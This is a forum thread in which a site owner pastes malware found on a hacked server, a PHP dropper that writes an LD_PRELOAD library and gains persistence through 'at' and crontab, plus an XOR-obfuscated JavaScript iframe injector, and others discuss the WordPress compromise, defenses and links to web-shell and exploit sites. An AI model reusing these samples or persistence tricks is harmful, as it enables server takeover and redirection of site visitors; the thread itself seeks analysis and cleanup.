1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Found Hackers code

Discussion in 'Security' started by KangBroke, Sep 12, 2015.

  1. #1
    Can anyone help me to decode what this is?
    \x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00\x01\x00\x00\x00\x54\x0d\x00\x00\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x60\x00\x00\xfe\x60\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\x00\x61\x00\x00\x00\x71\x00\x00\x00\x71\x00\x00\xf0\x07\x00\x00\xb0\x61\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00\x00\x61\x00\x00\x00\x71\x00\x00\x00\x71\x00\x00\x90\x00\x00\x00\x90\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00
    Code (markup):

    if (intval("9223372036854775807") == 2147483647)
        $arch = 32;
    $so = $arch == 32 ? $so32 : $so64;
    $f = fopen("/usr/bin/host", "rb");
    if ($f) {
        $n = unpack("C*", fread($f, 8));
        $so[7] = sprintf("%c", $n[8]);
        fclose($f);
    }
    $n = file_put_contents("./jquery.so", $so);
    $AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
    $HBN=basename("/usr/bin/host");
    $SCP=getcwd();
    @file_put_contents("1.sh", "#!/bin/sh\ncd '".$SCP."'\nif [ -f './jquery.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./jquery.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");
    @chmod("1.sh", 0777);
    @system("at now -f 1.sh", $ret);
    if ($ret == 0) {
        for ($i = 0; $i < 5; $i++) {
            if (! @file_exists("1.sh")) {
                print "AT success\n";
                exit(0);
            }
            sleep(1);
        }
    }
    @system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
    if ($ret == 0) {
        for ($i = 0; $i < 62; $i++) {
            if (! @file_exists("1.sh")) {
                print "CRONTAB success\n";
                exit(0);
            }
            sleep(1);
        }
    }
    @system("./1.sh");
    @unlink("1.sh");
    ?>
    
    Code (markup):

    SEMrush
     
    KangBroke, Sep 12, 2015 IP
    SEMrush
  2. KangBroke

    KangBroke Notable Member

    Messages:
    1,025
    Likes Received:
    58
    Best Answers:
    4
    Trophy Points:
    215
    #2
    <script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;
    '1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--
    '00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-
    qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;
    i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
    Code (markup):
     
    KangBroke, Sep 12, 2015 IP
  3. fisasti

    fisasti Active Member

    Messages:
    42
    Likes Received:
    5
    Best Answers:
    2
    Trophy Points:
    58
    #3
    Basically the script is creating a bash file, adding it to the crontab and making sure it executes without any errors. Could you search for the jquery.so file and the 1.sh and post its content here?
     
    fisasti, Apr 19, 2016 IP
  4. KangBroke

    KangBroke Notable Member

    Messages:
    1,025
    Likes Received:
    58
    Best Answers:
    4
    Trophy Points:
    215
    #4
    It has been over a year, I removed all suspicious code and files and swapped hosting. I think my second post was the jquery.so file. It was structured to use multiple files, I found several with similar names which should have never been there. I looked at all my logs and did as much research as I could in my free time.

    It appears to me that someone managed to gain access through a WP install. I had 2 adult sites using WP, and they were being brute force attacked all day every day from person(s) using different IP addresses and trying every login name in the dictionary. Was also triggering Godaddy bandwidth alerts.
     
    KangBroke, Apr 19, 2016 IP
  5. Kyle Hicks

    Kyle Hicks Active Member

    Messages:
    34
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    53
    #5
    Bro this is the end of your site. I experienced the same and Google labeled my site as "hacked". It's downhill from there. If Google noticed it, your URL is history. No way you will get your site back. Do the search for your URL in Google and see if you come up with the label "hacked site". WP is crap to be honest. If I were you, I'd switch to weebly paid, because it converts your site into static HTML or just create static site in text files. That's the only way. These hacks will keep coming back. I also installed Sucuri firewall at some point, but I think its stupid, it was blocking Google bots and real traffic from potential clients.... So there is no way to hide, only if you have static site. Also hosting your static site on the server is bad. You need to go with like Amazon S3 or Google cloud. If you have database and web server, it will still come back and "bite you in the a***"....
     
    Kyle Hicks, Apr 19, 2016 IP
  6. KangBroke

    KangBroke Notable Member

    Messages:
    1,025
    Likes Received:
    58
    Best Answers:
    4
    Trophy Points:
    215
    #6
    Not true, google Pissing Impossible.com

    I am no longer using WP, I just had it up for 2 adult sites. Now they are no longer WP


    There are others on DP that would argue that you are completely wrong about WP. I personally won't use it anymore. But some swear by it.
     
    Last edited by a moderator: Apr 19, 2016
    KangBroke, Apr 19, 2016 IP
  7. Kyle Hicks

    Kyle Hicks Active Member

    Messages:
    34
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    53
    #7
    The best course of action was moving site content by hand, completely destroying my previous site. If you think this is the only place with hack, you will be wrong. They use base64 encoding where nobody can even see what's happening. In my case Google was triggering it and when you open site yourself, you did not see anything wrong, but boy what was indexing in Google... You need to take it very seriously. I know company in India that specializes in these kind of issues. They know how to hack and reverse it. If you'd like I can hook you up...

    WP is crap and will always be crap.... sorry that's the reality :) If you think otherwise - I wish you the best of luck making money online, you will need lots of it.... :):):)
     
    Kyle Hicks, Apr 19, 2016 IP
  8. PoPSiCLe

    PoPSiCLe Illustrious Member

    Messages:
    4,630
    Likes Received:
    724
    Best Answers:
    152
    Trophy Points:
    470
    #8
    While WP _is_ crap for a lot of reasons, getting hacked isn't really one of them, as long as you make sure the plugins you use are safe, and being upgraded, and keep the installation itself upgraded - also, install something that makes the basic login and such a bit more secure, and of course make sure that the host itself hasn't got hundred security holes (ie, not a shared host, preferably). Yes, there are hundreds/thousands of hacked WP-blogs, but that is mostly due to lack of knowledge on the hosts or owners.

    While a properly coded solution (proprietary code) is usually a better choice, there's no way to know it's more secure - only reason it's not being hacked is because nobody knows about it (security by obscurity).
     
    PoPSiCLe, Apr 19, 2016 IP
    sarahk and KangBroke like this.
  9. KangBroke

    KangBroke Notable Member

    Messages:
    1,025
    Likes Received:
    58
    Best Answers:
    4
    Trophy Points:
    215
    #9
    See I just put up a WP just to have some fast content, didn't really care too much about the site honestly - more of a backburner project. I was being Brute Force attacked, you could see someone tying every login username imaginable. I did install a plugin to block failed login attempt IP's. I also used a list of banned IP's from a popular website which list them. They eventually won, It wasn't really that hard to guess honestly. I learned from it. Again I don't think WP is complete crap, but I am learning that I trust my own code more than relying on well known code used by WP.

    I agree with you that WP can be more secure if you take the time to do so, one of the easiest things to do is recode the login page so they cannot find it so easy.
     
    KangBroke, Apr 19, 2016 IP
  10. KangBroke

    KangBroke Notable Member

    Messages:
    1,025
    Likes Received:
    58
    Best Answers:
    4
    Trophy Points:
    215
    #10

    That is exactly what I did, I swapped hosts, 1 website at a time. I never said that was the only place, I said that was how they gained access, they did get into the root of my hosting and did infect every folder. I had to hand-pick it out. There are still 2-3 websites which I didn't finish - so they are not up yet.

    I was seeing plenty wrong, it was Russian Cialis ads all over my site.

    I agree with Popsicle that WP is not total crap, it can be used properly.

    Again I said, I won't be using WP anymore most likely, but I do feel that the code can be secured and not be as vulnerable. I won't be needing luck making money online, I do just fine.
     
    KangBroke, Apr 19, 2016 IP
  11. Kyle Hicks

    Kyle Hicks Active Member

    Messages:
    34
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    53
    #11
    Oh well, I am guessing you never seen someone installing text file with php through your wordpress contact page and getting total access to your database and admin of your WP or even better, to your entire server :)....

    Have you seen one of these: https://sourceforge.net/projects/cyber-shell/ - your browser will trigger "alert", but don't worry this site is safe, they let you download wonderful piece of code.... There even 5 star reviews from "users"... LOL...

    Or perhaps another beautiful site - http://0day.today/

    I am a programmer and I also was delusional about "perfect world" just like you are.... until I lost my extremely profitable online business..... Now I learned every single tool they use and I can tell you WP is crap... Real crap...

    Nothing is safe... Where computers, there loopholes. There lots and lots of loopholes in client/server applications. People live by discovering these loopholes because they make tons of money from doing that.

    The only solution is Amazon S3 or similar and static HTML files. That's pretty much your only option to be safe from hacking.... Many smart people doing just that.

    I wrote a program that takes HTML from wordpress and converts it all into static HTML. I don't understand why WP is not doing it these days. I guess WP people can care less....

    Here we go :)

    http://www.blackhatworld.com/blackh...3d-muslim-cyb3r-sh3llz-any-idea-how-undo.html


    If you'd like, backup your wordpress site and play with one of these to see how WP is "bullet proof"...
     
    Last edited: Apr 19, 2016
    Kyle Hicks, Apr 19, 2016 IP
  12. orrden

    orrden Greenhorn

    Messages:
    18
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    16
    #12
    ExploitDB is your friend for finding out if software is vulnerable. I check it weekly for the web based softwares I use and I check it before purchasing ANY web based software.
     
    orrden, Apr 19, 2016 IP
  13. PoPSiCLe

    PoPSiCLe Illustrious Member

    Messages:
    4,630
    Likes Received:
    724
    Best Answers:
    152
    Trophy Points:
    470
    #13
    Right. If you allow for uploads and access, don't secure your server, and make sure you don't have loopholes running circles, then of course it's dangerous. Personally, I would prefer if WP did a redesign on their DB-behavior as well, but that is possible to mitigate with a bit of creative coding - however that means redoing core-files, which is usually beyond most people.
    However, running whitelists, making sure that passwords and logins are secure, actually running through "5 steps to secure your WP-install" and making sure you don't run a hundred plugins you don't need takes away most of the trouble.
     
    PoPSiCLe, Apr 20, 2016 IP
  14. Nigel Lew

    Nigel Lew Notable Member

    Messages:
    4,641
    Likes Received:
    401
    Best Answers:
    21
    Trophy Points:
    295
    #14
    I solved, quite literally all my wp issues, with this stuff. https://wordpress.org/plugins/ninjafirewall/ it has a frankly non existent footprint. Unlike stuff like bulletproof security.

    It also totally helps to find the remaining bits of shifty shit on your machine as well.
     
    Nigel Lew, Apr 20, 2016 IP
  15. matt_62

    matt_62 Notable Member

    Messages:
    1,806
    Likes Received:
    493
    Best Answers:
    14
    Trophy Points:
    270
    #15
    @op, I am glad it is now sorted for you. Vulnerabilities can still exist even without wordpress. In addition to the normal backup methods, be sure to take regular ones, and store offline. This way, you can mitigate any serious problems quickly by wiping everything, and restoring a reliable backup.

    Adult sites are "high risk" and tend to be targeted more then your typical website. That said, nearly all wordpress sites have been under attack at some stage. I personally use various security plugins, wordfence is one of them.

    What I like to do is this. Do not use "admin", use another name. Set wordfence (or other plugin) to instantly ban any ip logging in with "non registered usernames". So as soon as they try to login with "admin", they get banned. I had hundreds of attack attempts, all instantly banned as they all used "admin".

    I do find that if you are running multiple wordpress websites, it is best to use a different cpanel account for each one. The reason I say this is that I have seen people with 10+ wordpress sites on a single cpanel account, and when they got hacked, its a was a complete disaster for them. Vulnerabilities in themes, or plugins can be exploited, and you dont want one weakness on one website to destroy your entire online presence.
     
    matt_62, Apr 20, 2016 IP